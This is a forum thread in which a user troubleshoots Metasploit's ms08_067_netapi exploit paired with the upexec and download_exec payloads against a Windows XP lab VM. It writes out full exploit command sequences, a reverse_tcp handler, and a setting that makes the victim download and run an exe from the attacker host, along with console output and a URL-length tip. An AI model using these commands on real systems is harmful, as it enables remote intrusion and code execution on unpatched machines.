
Thread: Help using payload windows upexec

  1. #1
    Just burned his ISO
    Join Date
    Dec 2010
    Posts
    4

    Help using payload windows upexec

    I'm testing upexec but I'm not able to get it to work. The ms08_067_netapi is working correctly with the meterpreter, but not with upexec.

    I'm using BT4 RC2, and on the Metasploit console I do:

    use exploit/windows/smb/ms08_067_netapi
    set payload windows/upexec/reverse_tcp
    set rhost 192.168.1.2
    set lhost 192.168.1.1
    set pexec /root/data/payloads/test/calc.exe
    exploit

    I get:
    [*] Started reverse handler on 192.168.1.1:4444
    [*] Automatically detecting the target...
    [*] Fingerprint: Windows XP - Service Pack 2
    [*] Selected Target: Windows XP SP2 (NX)
    [*] Attempting to trigger the vulnerability...
    [*] Sending stage (398 bytes) to 192.168.1.2
    [*] Sleeping before handling stage...

    And it hangs like that...

    Any help about using the upexec payload?

  2. #2
    comaX (Good friend of the forums)
    Join Date
    Feb 2010
    Location
    Paris, France
    Posts
    338

    Re: Help using payload windows upexec

    I never tried this particular exploit, but a few basic verifications could be useful:
    - Have you deactivated your AV?
    - Same with the firewall?
    - Is your victim system vulnerable to this exploit? MS has patched it: http://www.microsoft.com/technet/sec.../ms08-067.mspx

  3. #3
    Just burned his ISO
    Join Date
    Dec 2010
    Posts
    4

    Re: Help using payload windows upexec

    Hi ComaX, I will try to explain better:

    I never explored the upexec and download_exec payloads of the Metasploit framework.

    So the purpose of the test is to download / upload and execute an exe file as payload.
    To run some tests I'm using two VMs, one with BT4 RC2 and one with XP SP2 as the victim.
    The victim has the firewall disabled and no antivirus.
    I'm trying to upload/download and execute the Windows calculator (calc.exe).

    I know that with a meterpreter session it is possible with a simple upload and execute, and I have tried that just to double-check after your post...

    I'm experiencing some problems with both of the following procedures, in detail:

    1 ------------ WITH UPEXEC:
    use exploit/windows/smb/ms08_067_netapi
    set payload windows/upexec/reverse_tcp
    set lhost 192.168.1.1
    set rhost 192.168.1.2
    set pexec /root/data/payloads/test/calc.exe
    exploit

    I got…

    Started reverse handler on 192.168.1.1:4444
    Automatically detecting the target...
    Fingerprint: Windows XP - Service Pack 2
    Selected Target: Windows XP SP2 (NX)
    Attempting to trigger the vulnerability...
    Sending stage (398 bytes) to 192.168.1.2
    Sleeping before handling stage...

    And it hangs like that without any result; the victim does not run calc.exe.
    I have also tried with a server application, but nothing...

    So I have tried with a similar payload,

    2 ------------ WITH DOWNLOAD_EXEC:
    use exploit/windows/smb/ms08_067_netapi
    set payload windows/download_exec
    set lhost 192.168.1.1
    set rhost 192.168.1.2
    set url http://192.168.1.1/c.exe (httpd obviously active)
    exploit

    I got…

    Automatically detecting the target...
    Fingerprint: Windows XP - Service Pack 2
    Selected Target: Windows XP SP2 (NX)
    Attempting to trigger the vulnerability...
    Exploit completed, but no session was created.

    Even in that case the exe is not executed on the victim…
    And checking the Apache log, I cannot see any request on the server...

    If you have time and you are curious, I would like you to try those two payloads yourself; by the way, I think they are very useful...

    As a small tip, remember that the URL argument of download_exec accepts max 24 chars (beyond that you will get a buffer error), so your URL may be something like 192.168.1.1/1.exe (not 192.168.1.1/payload_test.exe)...

    When you have 10 minutes, if you are interested, please let me know. I would appreciate it.
